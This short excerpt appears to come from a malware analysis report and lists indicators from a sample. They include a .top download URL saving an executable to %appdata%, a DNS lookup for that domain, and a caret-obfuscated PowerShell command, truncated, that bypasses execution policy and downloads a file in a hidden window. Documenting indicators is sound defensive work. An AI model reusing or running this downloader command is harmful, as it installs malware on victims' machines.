Technical Information
- http://newyeargoka.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWE^r^SH^el^l.EXe^ -^ex^ecU^TI^OnpoLICY^ B^Y^pa^Ss ^-n^oP^Rof^I^L^E^ -wIn^do^WStYLe HIDDEN^ (New-^O^bj^ecT sY^St^E^M^.nET.^WE^bc^l^i^en^t).D^O^Wnl^oadFilE^('http://newyeargo...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "poWE^r^SH^el^l.EXe^ -^ex^ecU^TI^OnpoLICY^ B^Y^pa^Ss ^-n^oP^Rof^I^L^E^ -wIn^do^WStYLe HIDDEN^ (New-^O^bj^ecT sY^St^E^M^.nET.^WE^bc^l^i^en^t).D^O^Wnl^oadFilE^('http://newyeargo...' (with hidden window)